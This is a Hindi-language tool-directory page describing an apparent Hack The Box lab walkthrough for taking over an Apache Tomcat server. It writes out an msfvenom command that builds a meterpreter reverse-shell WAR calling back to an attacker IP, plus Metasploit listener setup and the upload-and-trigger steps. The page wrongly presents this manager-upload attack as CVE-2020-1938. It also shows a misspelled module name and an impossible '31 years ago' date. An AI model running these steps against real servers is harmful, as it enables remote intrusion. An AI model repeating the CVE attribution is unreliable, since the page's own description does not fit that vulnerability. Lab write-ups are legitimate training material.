Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/hopsypopsy8/cve-2020-1938-exploitation
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षालैब और अभ्यास
GitHubhopsypopsy8/cve-2020-1938-exploitation

CVE-2020-1938-Exploitation

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →

CVE-2020-1938 (Apache Tomcat में arbitrary JSP upload से RCE) का शोषण करने के लिए चरण-दर-चरण वॉकथ्रू, जिसमें msfvenom और Metasploit का उपयोग Hack The Box लैब वातावरण में किया गया है।

रिपॉजिटरी देखें
31 साल पहलेअभी तक समीक्षित नहीं
साझा करें

CVE-2020-1938 शोषण

Apache Tomcat मनमाना JSP अपलोड जिससे RCE होता है

विवरण

CVE-2020-1938 एक गंभीर कमजोरी है जो Apache Tomcat के 9.0.0.M1 से 9.0.0.30, 8.5.0 से 8.5.50 और 7.0.0 से 7.0.99 संस्करणों को प्रभावित करती है ⚠️ इसका Hack The Box प्रयोगशाला में शोषण किया गया था।

🔗 संदर्भ: NIST NVD प्रविष्टि

टोह लेना

हमले का वेक्टर पहचानना

image
  1. वेबसाइट में सर्वर स्थिति सुविधा के लिए डिफ़ॉल्ट क्रेडेंशियल हैं।

  2. यह इंटरफ़ेस इंगित करता है कि संस्करण Apache Tomcat/7.0.88, 64 बिट आर्किटेक्चर है।

  3. इस इंटरफ़ेस से हम एप्लिकेशन सूचीबद्ध करने के लिए जाते हैं जो .war फ़ाइल अपलोड सुविधा को उजागर करता है।

  4. सफल अपलोड पर .war फ़ाइल /directory/filename पर निष्पादित होती है।

  5. Apache Tomcat संस्करण पर शोध ने की कमजोरी की पुष्टि की।

CVE-2020-1938
  • शोषण

  • .war फ़ाइल उत्पन्न करना

    root@kitploit:~
    msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=10.10.14.3 LPORT=3004 -f war -o exploit.war
    

    msfvenom का उपयोग करते हुए, जो एक मेटास्प्लॉइट पेलोड जनरेटर है, हम अपना exploit.war पेलोड उत्पन्न करते हैं।

    1. -p windows/x64/meterpreter_reverse_tcp पेलोड का प्रकार है (हमारे मामले में 64 बिट जैसा कि सर्वर स्थिति में पहचाना गया)
    2. LHOST=10.10.14.3 LPORT=3004 हमलावर मशीन के लिए रिवर्स कनेक्शन विवरण हैं
    3. -f war फ़ाइल प्रकार है
    4. -o exploit.war आउटपुट फ़ाइल नाम

    फ़ाइल उत्पन्न करने के बाद, फ़ाइल में जाएं और .jsp फ़ाइल का नाम ढूंढें जैसे gcvxdtmxvw.jsp और इसे बाद के लिए सहेजें।

    मेटास्प्लॉइट सेट करना

    root@kitploit:~
    msfconsole
    use exploit/multi/hanlder
    Set LHOST 10.10.14.3
    Set LPORT 3004
    

    msfconsole का उपयोग करके हम एक लिसनर सेट करते हैं जो हमारे पेलोड के निष्पादित होने की प्रतीक्षा करता है।

    दुर्भावनापूर्ण फ़ाइल अपलोड करना और चलाना

    image
    image

    हम अपनी फ़ाइल को डिप्लॉय अनुभाग में अपलोड करते हैं, उसके बाद स्क्रीन को रिफ्रेश करते हैं और पाते हैं कि फ़ाइल सफलतापूर्वक अपलोड हो गई है। शोषण को पूरा करने के लिए हमें ip/hacked/gcvxdtmxvw.jsp पथ पर नेविगेट करना होगा।

    image

    यह अनुरोध को हैंग करता है हालांकि हम अपनी मशीन पर स्थानीय रूप से देख सकते हैं कि हमारे पास एक रिवर्स कनेक्शन है।

    टूल डाउनलोड करें